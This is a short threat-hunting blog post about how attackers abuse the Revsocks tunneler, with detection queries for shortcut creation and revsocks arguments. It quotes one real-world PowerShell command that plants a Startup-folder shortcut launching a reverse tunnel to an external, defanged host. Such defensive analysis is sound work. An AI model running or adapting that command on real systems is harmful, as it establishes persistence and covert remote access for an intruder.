178. Hunting for Another Tunneler: Revsocks

Hello everyone!

Tunnelers are everywhere! And this one becoming more and more popular among threat actors. Revsocks. Let's look at how this tool is abused in-the-wild.

Here's an example. The adversary abused PowerShell to create a shortcut in the Startup folder and execute revsocks:

powershell -Command "$s = (New-Object -COM WScript.Shell).CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m4.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Microsoft\Windows\m4.exe'; $s.Arguments = '-connect hxxps://metallurgify[.]com:16443 -tls -pass 1488 -ws'; $s.WorkingDirectory = 'C:\Users\user\AppData\Local\Microsoft\Windows'; $s.Save();"

So, the first hunting idea is to search for creating shortcuts with PowerShell:

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: "createshortcut"

Another one - hunting for revsocks-related command line arguments:

event_type: "processcreatewin"

AND

cmdline: ("connect" AND "pass")

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge